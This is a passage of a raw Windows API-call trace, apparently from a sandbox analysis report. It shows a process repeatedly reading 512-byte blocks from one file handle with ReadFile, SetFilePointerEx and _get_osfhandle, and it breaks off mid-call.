ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.938] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.938] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.938] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.938] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.941] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.941] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.942] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.942] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.942] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: 